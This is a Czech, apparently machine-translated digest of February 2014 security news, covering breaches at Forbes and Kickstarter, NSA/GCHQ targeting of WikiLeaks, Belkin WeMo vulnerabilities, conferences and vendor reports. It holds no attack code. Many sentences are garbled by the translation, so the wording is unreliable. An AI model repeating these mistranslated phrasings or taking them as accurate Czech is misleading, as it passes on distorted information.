. Masivní narušení bezpečnosti osobních údajů, které se stalo v posledních letech prokázaly nade vší pochybnost, že metoda ověřování znění heslo má mnoho nedostatků, výzkumní pracovníci a podniky, které pracují na alternativy k této chybné systému zabezpečení se však z mnoha různých režimů: obrázky a grafikou na bázi hesla, inkblot na základě hesla , pass-myšlenky , a tak dále. Všechny tyto přístupy hledají způsob pro uživatele vytvořených hesel, které budou jedinečné a snadno zapamatovatelné pro uživatele, ale je obtížné odhadnout, a / nebo přerušit pro útočníky. Poslední z těchto pokusů byl popsán počítačovým vědcem Zijad Al- Salloum ze ZSS-výzkum v Ras Al Khaimah, Spojené arabské emiráty. Věří, že "geografické" hesla jsou řešením problému (kliknutím na screenshotu pro zvětšení): . Tento přístup počítá s tím, že uživatelé mohou snadněji pamatovat oblíbené místo, které složité heslo, které si vybrali sami Pomocí tohoto systému, uživatel by si vybral místo na mapě - pozice stromu má rád k odpočinku pod, památník se mu líbí na návštěvu, místo, kde zažil svůj první polibek a tak dále -., a nakreslete hranici kolem něj "Volba zeměpisné oblasti, může být provedeno s použitím různých způsobů a tvarů, uživatel - například - můžete umístit kruh kolem svého oblíbeného hory, nebo polygon kolem svého oblíbeného souboru stromů, pro příklad, "vysvětluje Al-Salloum. "Bez ohledu na to, jak jsou vybrané geografické oblasti, geografické informace, které mohou být řízeny z těchto oblastí (jako je zeměpisná šířka a délka, nadmořská výška, plochy, obvodu, bocích, andělé, poloměr, nebo jiné) tvoří geografickou heslo. " Všechny tyto informace slouží k "vypočítat" heslo, které pak dostane "solené" s uživatelsky specifické náhodný řetězec znaků, a to vše dohromady dostane "hash" na konci. . Tímto způsobem různí uživatelé budou účinně nikdy mít stejné heslo Tento typ hesla má mnoho výhod: jsou snadno zapamatovatelné a těžké na to zapomenout, různorodé, a jen těžko předvídat. A podle Al-Salloum, "navrhuje efektivní výměnu běžných hesel by mohlo snížit 76% z narušení dat, na základě analýzy více než 47.000 nahlášených bezpečnostních incidentů.
SEA hacky Forbes, krade a nevrací záznamy o uživatelích 1M
26.2.2014 Hacking
Obchodní zpravodajský web Forbes a jeho registrovaní uživatelé jsou nejnovější obětí syrské elektronické armády (SEA) hacker kolektivní, který ukázal , že se vloupal do firemní sítě a vzlétl s databází obsahující více než 1 milion uživatelů a některé Forbes 'staffers záznamy . " Forbes.com byl zaměřen na digitální útoku a naše publikační platforma byla ohrožena, "která stojí za zveřejnění TEXT potvrdil krátce po zjevení, a varoval: "E-mailová adresa pro každého registrovaného Forbes.com byl vystaven prosím. mít na pozoru před e-maily, které purport pocházejí z Forbes, jako je seznam e-mailových adres, mohou být použity v oblasti phishingových útoků. " Také dodal, že hesla byly zašifrovány, ale že uživatelům udělá dobře, je v každém případě změnit jednou podepsat-na je znovu k dispozici. Poté, co zpočátku tvrdil, že by prodat databázi, SEA hackeři rozmysleli a dělal to k dispozici pro veřejnost ke stažení. Sophos 'Paul Ducklin a jeho kolegové se podařilo dostat své ruce na soubor, a zjistil, že záznamy obsažené uživatelská jména, šifrovaná data heslem, plná jména uživatelů, e-mailová adresa a další. Oni analyzovali data, a zjistil, že hesla nebyla šifrována, ale solené a hash. "Oni používají to, co se nazývá PHPass Přenosný formát," sdílené Ducklin, a vysvětlil, jak to funguje. "můžete" pracovat pozpátku "od Forbes datatbase k obnovení hesla, ale budete potřebovat hodně výpočetního výkonu, nebo čas, nebo obojí, "poznamenal a dodal schéma je dobré v případě, že uživatel zvolil složité a dlouhé heslo. , ale poté, co se jim podařilo prolomit hesla, které patří do Forbes staffers, bylo jasné, že i oni používají velmi špatné heslo. "Forbes udělal špatnou věc tím, že se porušila na prvním místě, a tím, že nechá SEA zmizet s jeho heslem databází, "komentoval Ducklin. "A zatímco 8193-iterace MD5 na bázi hašování popsaný systém je trochu krátký moderní osvědčených postupů (zkuste silnější hash, který trvá déle, než se počítat s více iterací), je to lepší než Adobe katastrofální "jeden klíč pro všechny šifrování "Systém.
Kickstarter trpí porušení dat
26.2.2014 Bezpečnost
Pokud jste někdy podpořila projekt Kickstarter, budete vědět, že populární crowdfunding platforma zažít porušení dat, a že některé z vašich informací byla ohrožena.
Společnost zároveň zveřejnila blogu a rozeslal e-mailové upozornění popisovat rozsah a možné důsledky kompromisu, stejně jako jejich činnosti v jeho brázdě. Oni byli informováni o porušení ve středu 12. února úředníky činnými v trestním řízení. " Na učit se toto, jsme okamžitě zavřel narušení bezpečnosti a začal posílení bezpečnostních opatření v celém systému Kickstarter, " zveřejněny CEO Kickstarter Yancey Strickler. "Žádné údaje kreditní karty jakéhokoliv druhu byla zobrazena hackery. Neexistuje žádný důkaz o neoprávněné činnosti jakéhokoliv druhu Na všechny ale dva uživatelské účty Kickstarter, "ujistil se na vědomí. , ale následující informace uživatele byla zobrazena:. uživatelská jména, e-mailové adresy, poštovní adresy, telefonní čísla, a šifrovaných hesel "Starší hesla byla jednoznačně solené a štěpen pomocí SHA-1 vícekrát. Novější hesla jsou zatříděna s bcrypt, "sdílené Strickler, a dovolil, že" je možné, že škodlivý osoby s dostatečným výpočetním výkonem hádat a bezva šifrované heslo, zejména slabý nebo zřejmý. " Uživatelé, kteří přihlášení do nastartoval s jejich Facebook přihlašovací pověření můžete být jisti, že jejich přihlašovací údaje nebyly ohroženy, ale bude muset znovu příště přístup na stránky jako Kickstarter se obnovit všechna Facebook přihlašovací údaje jako prevence. společnost doporučuje uživatelům vytvářet nové heslo, a aby jej změnit na jiné účty, pro které se používají starý. "Kickstarter udělal ty správné věci v návaznosti na porušení, upozornění uživatelů a radí jim obnovit hesla prostřednictvím svých internetových stránek. Je to moudré, jak to udělat, i když Kickstarter uloženy jeho hesla v zašifrované podobě, "uvedl Keith Bird, UK generální ředitel společnosti Check Point. "Ale uživatelé by měli být velmi opatrní kliknutí na odkazy v jakýchkoli navazujících e-mailů, které dostávají, které se zdají pocházejí z Kickstarter a příbuzných organizací, bez ohledu na to, jak pravděpodobný, že e-maily se zdají být. Existuje reálné nebezpečí, že údaje odcizeny v hacku mohou být použity v phishingových útoků, vyzkoušet a sklizeň i další osobní údaje. " Strickler nesdílel jakékoliv Podrobnosti o tom, jak se útočníkům podařilo na houpačce útok.
NSA a GCHQ cílené WikiLeaks a podporovatelé
26.2.2014 Špionáž
Nově analyzované dokumenty od NSA informátor Edwarda Snowdena je poklad bodu do USA NSA a ve Velké Británii GCHQ cílení WikiLeaks, své příznivce a další aktivisty, a snaží se určit WikiLeaks jako "škodlivý zahraniční herce", aby mohli používat elektronický dozor proti nim, aniž by . se obávat, zda jsou současně surveilling amerických občanů dokumenty zjevně ukazují, mimo jiné, že:
GCHQ shromažďují IP adresy návštěvníků na webových stránkách WikiLeaks
Americká armáda byla pikle zničit WikiLeaks
Obamova administrativa se snažila přesvědčit několik spojeneckých zahraniční vlády podat trestní oznámení proti Julian Assange k publikování více než 70.000 utajované dokumenty vztahující se na válku v Afghánistánu
Že proběhly diskuse o zaměření se na Pirate Bay a anonymní hacktivists.
Pro více informací, pro (konečně!) zveřejnila dokumenty, a pro reakce na zjevení, doporučuji navštívit nově vzniklý průnik
Hackeři dokázat masivní krádeže dat z amerického provozovatele kasina
26.2.2014 Kriminalita
Minulý týden hack a znetvoření na oficiálních stránkách US-založené Las Vegas Sands Corp. a že z populárních kasina působí zřejmě neovlivnilo zákazníky a hazardní systémy korporace.
Ale útočníci - hacker skupiny, který vystupuje pod názvem "Anti zbraní hromadného ničení týmu" -. Zveřejnili video, prokazující, že se dostat pryč s 828 GB souborů Eduard Kovacs zprávy (?) Javascript, aby soubory nebyly unikly on-line , ale video ukazuje jeden z hackerů projít složek a souborů, které exfiltrated (a dát na pevném disku), a mezi nimi jsou soubory s finanční informace společnosti, informace o svých zaměstnanců, hesla pro pracovní stanice, sítě, a mnoho více. Mezitím, společnost přinesla na postižená místa zpět do režimu online, s některými změnami. E-mailový systém společnosti byla také obnovena. Útok byl údajně připojen jako odplatu za Las Vegas Sands Corp CEO Sheldon Adelson projev, v němž vyzval americkou vládu shodit atomovou bombu na Írán namísto vyjednávání. Vyšetřování stále probíhá, a vymáhání práva byl zapojen, takže další odhalení o ohrožení dat jsou možné.
Ředitel FBI James Comey na keynote RSA konference 2014
26.2.2014 Bezpečnost
RSA Conference oznámil, že ředitel FBI, se James B. Comey poskytnout keynote prezentaci na středy 26 února na konferenci RSA 2014 v San Franciscu. Během svého zasedání "FBI a soukromý sektor: překonání rozdílů v kybernetické bezpečnosti," Comey bude diskutovat své názory na horní kybernetických hrozeb pro národní bezpečnost USA. Účastníci se naučí, že zatímco americká vláda a podniky učinily velké pokroky v počítačové bezpečnosti, tam je ještě mnoho práce je třeba udělat. Comey vysvětlí potřebu vlády a soukromého sektoru k lepší informovanosti podíl hrozeb v reálném čase, aby se překlenout propast, a nejlépe řešit dnešní kybernetickým hrozbám. V září 2013 Comey složil přísahu jako sedmý ředitel FBI. New York rodák, Comey vystudoval College of William and Mary a University of Chicago Law School. Působil jako asistent amerického zástupce v obou jižní obvod New Yorku a východní obvod Virginie. Comey později se vrátil do New Yorku, aby sloužil jako USA zmocněnec pro jižní obvod New Yorku. V roce 2003, on byl jmenován sloužit jako náměstek generálního prokurátora z ministerstva spravedlnosti. "S přetrvávající hrozbou útoků na kritické vlády a veřejné infrastruktury je nyní čas pro komunitu mít hlubší diskusi o kritických strategií pro ochranu a obranu , "řekl Alex Bender, GM RSA Conference. "S řediteli FBI Comey dárek na letošní konferenci RSA je ideální příležitost pro rekordní počet bezpečnostních odborníků, aby se zapojily nejvyšší americký vládní úředník sdílet a dozvědět se o nejnovějších trendech v bezpečnostním inteligence."
Půl milionu uživatelů Belkin WeMo jsou široce otevřené pro útočníky
26.2.2014 Kriminalita
IOActive odhalil několik zranitelností ve Belkin WeMo domácí automatizace zařízení, které by mohly mít vliv na více než půl milionu uživatelů. Belkin WeMo používá Wi-Fi a mobilní internet k ovládání domácí elektroniky kdekoliv na světě, přímo z telefonu uživatelů.
Mike Davis, IOActive je hlavní vědecký pracovník, odkryl několik zranitelností v sadě produktů WeMo který dává útočníkům schopnost:
Dálkové ovládání WeMo Home Automation připojená zařízení přes internet
Proveďte škodlivé aktualizace firmwaru
Vzdáleně monitorovat zařízení (v některých případech)
Přístup k interní domovské sítě.
Řekl Davis, "Když spojíme naše domovy na internetu, je stále důležitější pro Internet-na-věci vendors zařízení, které zajistí, že přiměřené methodologies zabezpečení jsou přijaty na počátku vývojových cyklů výrobku. To snižuje expozici svých zákazníků a snižuje riziko. Dalším problémem je, že zařízení WeMo využít pohybové senzory, které mohou být použity útočník vzdáleně monitorovat obsazení v domácnosti. " Dopad Chyby nalezené v rámci zařízení Belkin WeMo vystavit uživatelům několik potenciálně nákladných hrozeb, od domácích požárů se možné tragické následky až do odpadu jednoduché elektrické energie. Důvod pro toto je, že poté, co útočníci ohrozit zařízení WeMo, mohou být použity k dálkovému zapnutí připojených zařízení zapínat a vypínat kdykoliv. Vzhledem k počtu WeMo zařízení v provozu, je vysoce pravděpodobné, že mnoho z připojených přístrojů a zařízení budou bez dozoru, což zvyšuje hrozbu těmito chybami zabezpečení. Navíc poté, co útočník naváže připojení k WeMo zařízení během několika obětí sítě;. Zařízení lze použít jako opěrný bod k útoku na jiné zařízení, jako jsou notebooky, mobilní telefony, a připojené úložiště souborů v síti zranitelnosti Obrazy Belkin WeMo firmware, které se používají k aktualizaci zařízení, jsou podepsány pomocí šifrování veřejným klíčem k ochraně proti neoprávněné úpravy. Nicméně, podpis klíče a hesla jsou unikly na firmware, který je již nainstalován na zařízení. To umožňuje útočníkům používat stejný podpisový klíč a heslo pro přihlášení své škodlivé firmwaru a bezpečnostní obtok kontroly během procesu aktualizace firmwaru. Navíc Belkin WeMo zařízení nemají ověřit Secure Socket Layer certifikátů (SSL) jim brání ověřování komunikace s Belkin oblak servis včetně aktualizace firmwaru RSS. To umožňuje vydávat cloudových služeb Belkin a tlačit škodlivé aktualizace firmwaru a pověření zachytit současně útočníci použít jakýkoli certifikát SSL. Vzhledem k integraci cloud, aktualizace firmware se tlačil do domu oběti bez ohledu na to, které spárované zařízení přijme oznámení o aktualizaci nebo jeho fyzické umístění. Internetové komunikační infrastruktura používá pro komunikaci Belkin WeMo zařízení je založen na týrané protokolu, který byl navržen pro použití o Voice over Internet Protocol (VoIP) služby, jak obejít firewall nebo NAT omezení. Dělá to tak, že ohrožuje všechny WeMo zařízení zabezpečení vytvořením virtuálního WeMo darknet, kde lze všechny WeMo zařízení připojené přímo,., A, s některými omezené hádání o "tajné číslo", kontrolované i bez aktualizace firmwaru útoku Belkin WeMo server aplikace programovací rozhraní (API) Bylo rovněž zjištěno, že mohou být zneužity k začlenění zranitelnosti XML, který by umožnil útočníkům ohrozit všechny WeMo zařízení. IOActive úzce spolupracoval s CERT na zabezpečení, které byly objeveny. CERT několik pokusů kontaktovat Belkin o otázkách, nicméně, Belkin byl necitlivý. aktualizace: středa 19 února 2014 Belkin nás kontaktovat pomocí následujícího příkazu: Belkin byl opraven seznam pěti možných slabých míst, které se týkají WeMo řadu domácí automatizace řešení , který byl publikován v CERT poradenství na 18. února. Belkin byl v kontaktu s výzkumnými pracovníky bezpečnostních před zveřejněním poradenství, a od 18. února už vydal opravy pro každý ze zjištěných potenciálních slabých míst prostřednictvím in-app oznámení a aktualizace. Uživatelé s nejnovější verzi firmwaru (verze 3949), nejsou ohroženi na zákeřné útoky s firmwarem, nebo dálkové ovládání nebo sledování WeMo zařízení od neautorizovaných zařízení. Belkin naléhá na takové uživatele ke stažení nejnovější aplikace z App Store (verze 1.4.1) nebo Google Play Store (verze 1.2.1) a potom inovovat na verzi firmwaru prostřednictvím aplikace. Specifické opravy Belkin vydala patří: 1. Aktualizace API serveru WeMo dne 5. listopadu roku 2013, zabraňuje XML vstřikování útoku získat přístup k jiným zařízením WeMo. 2. Aktualizace na WeMo firmware, zveřejněné 24. ledna 2014, který přidává šifrování SSL a ověřování na distribuční firmware krmiva WeMo, eliminuje ukládání podpisu klíče na zařízení, a heslo chrání rozhraní sériového portu, aby se zabránilo škodlivému útok firmware 3. Aktualizace aplikace WeMo pro obě iOS (zveřejněné 24. ledna 2014) a Android (zveřejněné 10. února 2014), který obsahuje nejnovější aktualizace firmwaru
Největší obavy chybějící hrozeb mezi zranitelností bezpečnostních profesionálů
26.2.2014 Zranitelnosti
Kontinuální monitoring, jehož kořeny leží s americkou vládou, řeší mnohé z problémů, jimž čelí tradiční řešení pro správu zranitelností a nabízí CISO a vedoucí bezpečnosti napříč odvětvími blízko real-time pohled na bezpečnostní pozici svých institucí. Nový průzkum zjistil, že Organizace, které zavedly průběžné sledování jsou více než dvakrát vyšší pravděpodobnost, že je spokojen s jejich přístupem pro správu zranitelností ve srovnání s těmi, kteří používají periodické skenování. Navíc Forrester zeptal se 45 procent respondentů, kteří se přijala CM vysvětlit výhody. Říkali, že kontinuální monitorování:
Výhody všechny fáze řízení zranitelnosti
Výhody všechny vertikály
Lepší vybavuje organizace vypořádat s mobilní pracovní síly
Výhody ty s rizikem VM programu nejvíce zaměřuje
Splňuje CISO více než jakýkoli jiný roli.
Konzumerizace, mobilita a cloud jsou charakteristickými znaky rozšířeného podniku, a pravidelné snímek skenování zranitelnosti nelze účinně řešit dynamickou povahu dnešních rozšířených podnikových prostředích. I když to katapultovalo řízení zranitelnosti jako jeden z nejlepších obav pro organizace - 86 procent respondentů hodnotí to jako jejich druhý nejvyšší bezpečnosti IT priority pro příštích 12 měsících - zůstávají zabývající se účinně snižuje riziko jejich organizace kompromisu. . Konkrétně, organizace se snaží zavést účinné postupy řízení zranitelnosti, takže je vystaven útokům Studie zjistila, že:
Téměř 74 procent dotázaných respondentů potýkají s problémy s jejich celkovým programem VM
79 procent tvrdili, že byli s větší pravděpodobností chybět kritické zranitelnosti vzhledem k nedostatečným údajům zúžit vhodné koncové body pro skenování
70 procent skenování měsíčně nebo méně.
"Průzkum ukazuje, že i když organizace používají pravidelné prověřování zranitelnosti, je to prostě nestačí," vysvětlil Ron Gula, CEO a CTO Tenable Network Security. "V dnešním prostředí mobilní, oblačnosti a BYOD, rozšířený podnik představuje zvláštní problémy, a organizace zjišťují, že je obtížné, aby se tradiční správu slabých míst práce pro ně. Potřeba bezpečnosti, která pokrývá 100 procent aktiv po celou dobu nikdy nebylo více zřejmé, než s nedávnou sérii úspěšných porušení. " Udržení konzistentní a efektivní správu slabých míst pracovního postupu se ukázal jako hlavní problém 77 procent respondentů má obavy o přesné objev aktiv. Exploze přechodných koncových sloučenin obtíže objevují majetek v organizaci a výrazně zvyšuje pravděpodobnost účinného porušení, pokud jsou neznámé aktiva nejsou identifikovány a řádně posouzeny. Navíc, 66 procent uvedlo, že nebyli jisti v provádění správné zranitelnosti nápravu. Poté, co snímá data vrácena, neměli pocit, že měli jasnou představu o rizicích tak, aby se přesně stanovení priorit jednat. "Pravidelné skenování zranitelnosti selhaly v novodobé CISO," řekl Gula. "Porušení se stále vyskytují alarmující rychlostí, a hrozeb se neustále vyvíjí. Cílem pro jakékoliv CISO je zůstat na špici ohrožení, a jediný způsob, jak to udělat, je přes přijetí kontinuální monitorovací platformu. To umožňuje uživatelům rychle nasadit záplaty vypnout těmto hrozbám v hodinách, nikoli měsíců, aby nebezpečné okna příležitost se zavřel před business-critical data jsou ohrožena.
Jeden z prvních vynálezců síť brány firewall, aby se do Abu Dhabi
26.2.2014 Bezpečnost
Jeden z tvůrců prvního světového síťový firewall a autora "Firewall a Internet Security: odpuzující lstivý Hacker", Bill Cheswick, bude dodávat prezentaci na jednom z nejočekávanějších konference v roce 2014, 3. vydání z Cyber Security pro energetickou & Utilities 2014 konferenci, kterou pořádá IQPC The Westin, Abu Dhabi 23 - 26 března 2014.
. Událost je shromažďování počítačové bezpečnostní odborníky z celého světa, aby SAE s konkrétním cílem zabránit v reálném čase hrozby a správu bezpečnostních výzev pro SCADA / ICS systémů IT bude Bill se mluví o "Přehodnocení hesel a pinů: Fix naše oslabení bezpečnost ". On komentuje, "Authentication je docela jasně rozděleny. I když máme příklady dlouhodobých úspěchů, existují zprávy o masivních dat heslem rozlije po celou dobu. Jak se můžeme dostat z této situace? Navrhuji některá řešení či pokyny, které mohou být zajímavé pro účastníky. " On se zeptal, jak ICT průmysl se potýká s výzvami, se dále dodává: "Špatně. I když věci obecně pracují (viz, například, úspěch v online bankovnictví), většina institucí jsou citlivé na špionáž a vnější rušení, a to navzdory osvědčených postupů. Něco velký dost být nazýván "intranet" je zřejmě mimo kontrolu. Vždycky jsem si najít konference jako to bude skvělé místo, učit se nové věci a držet krok s nejnovějšími problémy a jejich řešení. Je to jedna z velkých výhod je pozván, a děkuji vám. Očekávám, že účastníci budou mít stejnou zkušenost. " událost také slibuje hostit řadu VIP hodnostářů z hlavních vládních a soukromých organizací, včetně ropných a plynárenských společností. Dr. Jamal Al Hosani, oficiální mluvčí a ředitel informačních a komunikačních technologií, National Emergency krize a katastrofy řídící orgán, budou Spojené arabské emiráty se uvádět události a také dává hlavní projev na vývoj ochrany kritické infrastruktury. Podplukovník Faisal Al Shammari, Chief Information Security Officer z Abu Dhabi Policie bude dodávat druhý hlavní projev a řešit důležité téma kybernetické obrany iniciativ strategie a realizace. Don Codling, bývalý vedoucí odboru kybernetické bezpečnosti Federal úřad pro vyšetřování (FBI) bude předsedat událost, vedení celodenní workshop na téma kontroly ICS systémů a kybernetické inteligence, stejně jako mluvit na velmi zajímavé téma - "Reálné příklady narušení bezpečnosti ICS z FBI. "Moje Témata konference bude zaměřen nejen na reálných příkladech světových kybernetických průniky trestních ICS systémů, ale také připomenout účastníka některé z "lidské motivace" faktorů podílejících se na těchto typech událostí a posílit základy reagovat jak na fyzické narušení a počítačových porušení . I když je důležité, aby účastníci nezapomeňte snažit se držet stanovených kritických kontrol, je stejně důležité mít přesné a neustále se vyvíjející obraz krajiny hrozeb (z kybernetické hrozby inteligence), tak, aby mohli co nejefektivněji a efektivně nasadit své omezené zdroje. Je to také jde se ven tím, že základy musí být důsledně dobře snížit možnost útočník nalézt slabé místo ve vaší obraně. " Základní penetrační plochy musí být označeny ve vysoce kritické infrastruktury, protože ty jsou nejvíce citlivé na vnější hrozby. SCADA, DCS a ICS systémy jsou považovány za velmi kritický ve většině z ropy, zemního plynu, energetických a hliníkových společností. V reálném čase hrozby hlásí nárůst četnosti jejich výskytu a společnosti byly na přijímajícím konci těchto hrozeb. ADCO vedoucí oddělení IT bezpečnosti, Reimer Brouwer, GASCO vedoucí oddělení IT služby, Mohamed Al Sawafi, Koc je Sr Real-time Engineer Andrey Zolotavin, KGOC v Sr IT Engineer, Abdulla Al-Akhwand a několik dalších se také mluví v tomto případě na velmi zajímavá témata. "My se zabývá základní otázkou řízení SCADA zadní vrátka zranitelnosti. Kalení SCADA protokoly a služby, a zajištění ochrany v reálném čase hrozby zůstává hlavní výzvou ropy, zemního plynu a energetických společností. Moje prezentace pomůže účastníkům získat vhled a dospět k pozitivní obchodní výsledky k řešení těchto problémů, "říká George Jason, viceprezident Comguard. Správa rizik v cloud computingu bude ve velké míře pokryty ISACA Spojených arabských emirátech je prezident, Gurpreet Kochar zatímco velké bezpečnostní údaje se vztahuje Ali Rebaie, jeden z předních světových 51 Big dat vlivy. Hnojiv IT Security Officer, bude Mohammed Ikrami se dotýká velmi zajímavé a univerzální téma zahrnuje bezpečnostní informace pro chytřejší budoucnosti. Tématem bude upozornit na pokročilé počítačové analýzy, která je jádrem každého post-mortem hlášených incidentů. "Počítačová bezpečnost je velmi důležitým aspektem energetického podnikání dnes. Kolik vůbec děláte, nebude postačovat v tomto neustále se vyvíjející hrozby. Těším se, aby se zúčastnili 3. ročník Cyber Security v Abu Dhabi a vidět některé zajímavé rozhovory od fantastických odborníků z celého světa. Nikdy jsem neviděl tuto všestrannost reproduktory, stejně jako návštěvníků, a to je příležitost, že bych se chtěl nechat ujít. To je vzrušující platformu, kde bych si přál, aby firmy a odborníci pracují na implementaci nejlepších postupů a překonávání problémů ve Spojených arabských emirátech, "říká Jeho Excelence Khaled Al Mansouri, prezident IAEM a ICBR, který je jedním z VIP účastníků na této prestižní akce. Don Codling komentáře, "příležitost setkat se s kolegy a vrstevníky v celé řadě společností a národů umožňuje volnou výměnu nápadů, zkušeností a osvědčených postupů. Možná stejně důležité, navazování osobních vztahů s kolegy v průběhu událostí, jako jsou této události IQPC je rozhodující v době krize, bylo prokázáno, znovu a znovu, aby výrazně snížit dobu odezvy a administrativní tření při kybernetických narušení událostí.
GFI Cloud dostane lepší sledování výkonu
26.2.2014 Bezpečnost
GFI Software má lepší možnosti monitorování výkonu sítě a další funkce GFI Cloud , společnosti IT platformu pro malé a střední podniky, které umožňuje IT administrátorům snadno spravovat a zabezpečit servery, pracovní stanice, notebooky a mobilní zařízení z jediného, intuitivního, webové uživatelské rozhraní .
Dnešní SMB správce IT nese mnoho povinností s cílem podpořit jejich sítě a koncové uživatele. Snad nejdůležitější je zachování provozuschopnosti sítě a poskytování služeb. S ohledem na tuto skutečnost, GFI Cloud nyní dává správcům hlubší přehled o výkonu serverů a pracovních stanic o sledování využití CPU, paměť a výkon disku. To jim umožňuje určit a řešit problémy s výkonem sítě před tím, než může mít dopad na produktivitu. Mezi další nové funkce patří více výkonné nástroje pro podávání zpráv, které umožňují organizacím, aby bedlivě soupis všech softwarových aktiv a sledování účinnosti politik webové použití. Administrátoři budou přijímat zprávy výstrah je, když se politika web-použití byla porušena koncové uživatele. Powered by GFI LANguard 2014 , automatizované funkce pro správu náplast GFI Cloud je nyní podporují více než 20 dalších oprav třetích stran, včetně produktů od Adobe. Kromě všechny záplaty společnosti Microsoft a nyní více než 50 aplikací třetích stran, GFI Cloud podporuje 12 nejzranitelnější aplikace v roce 2013. služby GFI Cloud poskytují malým a středním podnikům s pokročilými Ochrana před viry a anti-malware, patch management, ochrana Web, monitorování sítě a služby pojištění, a majetku a řízení zásob. Tyto služby poskytují správcům schopnost monitorovat zdraví a stabilitu svých sítí a optimalizaci serverů a pracovních stanic konfigurace pro zvýšení výkonu. některé nebo všechny z těchto služeb mohou být nasazeny ve flexibilní a škálovatelné způsobem, který nejlépe vyhovuje jedinečné obchodní potřeby malých a středních firem. Je také snadno integruje s vzdáleného přístupu systému TeamViewer. Pokud je TeamViewer detekován na počítači, GFI Cloud automaticky umožňuje jedním klepnutím přístup k tomuto počítači, který umožňuje správci IT brzy vyřešit problémy a jejich řešení rychle. služby GFI Cloud, jako například webovou ochranu, Antivirus a Patch Management, jsou Kus Oceněno pouhých 12 liber na počítači, za rok. Multi-rok a servisní svazku slevy platí. Všechny odběry jsou dodávány s celosvětově uznávané zákaznický servis podporu GFI, k dispozici 24/7 a údržbu softwaru.
Co můžete očekávat na konferenci RSA 2014
26.2.2014 Bezpečnost
Roční RSA Conference se koná příští týden v San Franciscu, a Avivah Litan, viceprezident a odlišit analytik společnosti Gartner, pokud své myšlenky na to, co můžete očekávat na letošním ročníku a na některé z nejlepších bezpečnostních trendů v roce 2014.
Co očekáváte od RSA v letošním roce?
jsem očekával hodně brnknout o nedávných maloobchodních porušení, programy pro dozor nad NSA a DDoS útoky. Mnoho řečníků a prodejců na výstavě budou pravděpodobně využívat nepřeberné množství bezpečnostních přestupků v loňském roce vytvořit pocit naléhavosti pro více inteligentních řešení. Očekávám, že "inteligentní analýzy" a "kontext vědom zabezpečení", které mají být základní témata. Jedním z přednáškách na RSA se zaměří na redefinici identity ve věku inteligence řízené bezpečnosti. Zatímco identita se nachází v centru kybernetické bezpečnosti, rychlý růst Nexus ozbrojených sil - mrak, informace, mobilní a sociální - určuje, co lze přistupovat a jak. Jak vidíte Nexus sil ovlivňujících inteligence řízené bezpečnosti? Nexus Sil (konvergence čtyř vzájemně propojených trendů: sociální interakce, mobilita, cloud, a informace) vytvoří mnohem bohatší sadu kontextových informací o identitách. To umožňuje skutečné analýzy časových a obchodní rozhodování asi hodně různých složek informace o identitě, takže jednotlivci mohou být efektivněji servis, a podniky se může stát výhodnější. Ale to vše také přichází s bezpečnostními a soukromí rizik. Myslím, že všichni čelí obrovským výzvám, o tom, jak využít přílivových vln informací o totožnosti a kontextových dat při respektování soukromí a udržování bezpečného prostředí. soukromí Zákazník je vždy obrovský obavy, dokonce více tak po nedávných narušení dat na velkých prodejců , a během posledních několika týdnů, řada prodejců oznámila výrazné změny zabezpečení na některé ze svých výrobků. Jaké jsou hlavní oblasti, na které se zaměřují na zajištění soukromí zákazníka? soukromí zákazníků v části znamená, že zákazníci budou mít konečné slovo při rozhodování o tom, jak je jejich sdílení informací. To obecně znamená, že spotřebitelé právo rozhodnout v tom, jak se informace o nich shromažďují, jaké informace jsou shromažďovány a jak je jejich sdílení informací. To je, když na ochranu osobních dat se stává smysl. Problém s maloobchodu a plateb je, že zabezpečení dat a soukromí jsou mimo kontrolu spotřebitelů. Nemají žádný vliv na to, jak je jejich údaje platební karta chráněna. Jediné, co mohou udělat spotřebitelé se nesmí používat kreditní nebo debetní karty, například v případě, že se obávají krádeže těchto informací. Kam myslíš, že podniky a maloobchodníci by měli zaměřit své bezpečnostní úsilí v průběhu několika příštích let? bych samostatné bezpečnostní úsilí se do dvou širokých oblastí - první je funkční a druhý je strategické. Pro jistotu, podniky potřebují uzamknout své pevnosti, stejně jako je to možné na operační straně - například prosazování silné, ale riziko vychází kontextové ověřování, ujistěte se, hesla nejsou sdíleny zařízení, whitelisting software, který lze spustit na koncových bodech, whitelisting . bodů, které mohou být citlivé informace převedeny do více Současně, oni potřebují také dát úsilí do strategických technologií - a to pro analýzu bezpečnostních a zpravodajských služeb, které využívá rychlý přístup k důležitým informacím. To jim dá možnost určit přestupky uprostřed neustálého hluku a přívalem každodenních událostí. Například by to umožnit, aby podnik detekovat anomální přístup k serveru nebo anomální chování na koncový bod a korelovat tyto anomálie s jinou interní a externí informace s cílem získat obraz o bezpečnostní přestupek proti podniku.
Odstranění administrátorská práva zmírňuje 92% kritických zranitelností Microsoft
26.2.2014 Zranitelnosti
Avecto analyzovali data z bezpečnostních bulletinů vydaných společností Microsoft v průběhu roku 2013 a dospěl k závěru, že 92% všech chyb než Microsoft s kritickým stupněm závažnosti lze zmírnit tím, že odstraní administrátorská práva.
Výsledky také ukázaly, že odstranění administrátorská práva by zmírnily 96% kritické zranitelnosti, které ovlivňují operační systémy Windows, 91% kritické zranitelnosti, které ovlivňují Microsoft Office a 100% zranitelností v aplikaci Internet Explorer. Pokud malware infikuje uživatele s právy administrátora, může to způsobit neuvěřitelnou škodu místně, ale i v širším síti. . Navíc, zaměstnanci s právy administrátora mají přístup k instalaci, upravovat a mazat software a soubory, stejně jako měnit nastavení systému Paul Kenyon, spoluzakladatel a viceprezident pro Avecto řekl: "Nebezpečí právy administrátora byly dobře zdokumentovány na nějakou dobu, .. ale co víc o je počet podniků se mluvit, že stále ještě nejsou plně vědomi, kolik uživatelů admin mají Bez jasnou viditelnost a ovládání, které se potýkají s neznámou a vyčíslen bezpečnostní hrozbu " dospěl k závěru, Paul: "Tato analýza se zaměřuje čistě na známé zranitelnosti, a počítačoví zločinci budou rychle využít chyb, které jsou neznámé dodavatelům. Obrana proti těmto neznámým hrozbám je obtížné, ale odstranění administrátorská práva je nejúčinnější způsob, jak to udělat. "
Apple vydal OS X 10.9.2 záplatování SSL zranitelnost a aktualizuje Safari
26.2.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, který záplaty SSL zranitelnost diskutovali Rick v neděli . Pro více informací navštivte stránku společnosti Apple o tom . Kromě toho Apple také vydal aktualizaci zabezpečení pro Safari a QuickTime .
Mobilní malware Evolution: 2013
26.2.2014 Analáza | Mobil
Mobilní malware sektor je rychle rostoucí a to jak technologicky a konstrukčně. Je to bezpečné říci, že dnešní cybercriminal již není osamělý hacker, ale součástí vážné hospodářské činnosti.
